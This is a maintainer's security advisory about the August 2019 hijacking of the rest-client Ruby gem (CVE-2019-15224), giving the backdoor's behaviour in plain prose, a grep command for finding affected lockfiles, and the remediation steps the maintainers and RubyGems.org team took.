Topics

rest-client version 1.6.13 backdoored with malicious code [CVE-2019-15224]

Andy Brody
 

Hi all,

On August 14, attackers published a series of rest-client versions
from 1.6.10 to 1.6.13 using the credentials of a rest-client
maintainer whose RubyGems.org account was compromised. The affected
versions were downloaded a small number of times (~1000).

On August 19, Jussi Koljonen observed the malicious gem version and
created an issue. Later that day, the RubyGems security team yanked
the offending gem version and locked the affected maintainer's
account. Several other gems were similarly affected.

https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019

The malicious backdoor in version 1.6.13 would activate in Rails
installations where Rails.env started with "p" (as in "production").
It would then download code from a Pastebin.com URL and execute it.
The pastebin is now gone, but it reportedly phoned home to execute
instructions from mironanoru DOT zzz DOT com DOT ua, which has also
disappeared. This was reportedly used to mine cryptocurrency, but
could have been used for any purpose.

Most rest-client users were not affected because the 1.6.x series is
very old and was superseded by 1.7.0 in 2014. Only users who pin to
1.6.x and updated to 1.6.13 in the last week could have been affected,
and only then in Rails production environments.

To search for Gemfile.lock files containing one of the malicious
versions, you may find this grep command useful:
cd dir-to-search
grep --include='Gemfile.lock' -r . -e 'rest-client (1\.6\.1[0123])'

The rest-client maintainers will take a number of steps in response to
this incident:

First, we have released a new version 1.6.14 so that users who are for
some reason unable to upgrade to a modern version of rest-client can
have confidence in the security of a `bundle update`.

Second, we will establish security practices that we expect of
maintainers, such as enabling two-factor authentication on
RubyGems.org accounts (available since last year).

Third, we will seek to adopt policies for maintainer activity and
continuity, and ideally seek one or two new active maintainers. The
latest release prior to today was in 2017, so it is not a surprise
that rest-client has several maintainers who have not been active in
many years.

The RubyGems.org team is also in the process of making a number of
upstream security improvements in response to the increasing
prevalence of attacks targeting popular open source libraries. These
include:
- Adding web UI to show which specific user pushed or yanked a given
gem release.
- Adding email notifications to owners of new gem pushes. (currently
disabled due to using a free email provider plan)
- Validating passwords against a list of known compromised passwords.
(in progress)

You can see this work in progress or make your own contributions at
https://github.com/rubygems/rubygems.org/

Thanks for your patience and support,
Andy

References:
https://github.com/rest-client/rest-client/issues/713
CVE-2019-15224